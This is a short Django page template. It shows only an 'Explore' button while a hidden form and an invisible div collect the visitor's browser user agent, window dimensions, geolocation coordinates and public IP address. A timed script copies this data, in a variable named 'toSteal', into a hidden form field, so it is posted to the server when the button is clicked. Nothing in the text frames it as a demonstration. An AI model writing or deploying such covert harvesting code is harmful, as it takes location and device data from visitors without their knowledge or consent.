{% extends 'base/base.html' %}

{% block content %}

<form  action="" method="post">
    {% csrf_token %}
    <input type="submit" value="Explore">

    <table style="opacity: 0;">
        {{ form.as_table }}
    </table>

</form>

<div id="kkk" style="opacity: 0;">

<p id="dd"></p>
<p id="ee"></p>
<p id="tt"></p>
    <center>

        <h1>GeeksforGeeks</h1>

        <h3>Public IP Address of user is:</h3>

        <p id="gfg"></p>
    </center>
<p id="demo"></p>

</div>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<script>
  console.log('eee')

var x = document.getElementById("demo");
var ggg = document.getElementById("dd");
var fff = document.getElementById("ee");
var iii= document.getElementById("tt");
ggg.innerText = window.navigator.userAgent
fff.innerText = window.innerHeight
iii.innerText = window.innerWidth

  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(showPosition);
  } else {
    x.innerHTML = "Geolocation is not supported by this browser.";
  }

function showPosition(position) {
  x.innerHTML = "Latitude: " + position.coords.latitude +
  "<br>Longitude: " + position.coords.longitude;
}

  $.getJSON("https://api.ipify.org?format=json", function(data) {
        $("#gfg").html(data.ip);

    })
    document.getElementById("kkk").style.visibility = 'visible';
    document.getElementById("id_name").style.visibility = 'visible';

setTimeout(()=>{
  var toSteal = document.getElementById("kkk").innerText;
  document.getElementById("id_name").value = toSteal;
  console.log('ddd')
  
  console.log(toSteal)
}, 5000)
    
    

</script>

{% endblock %}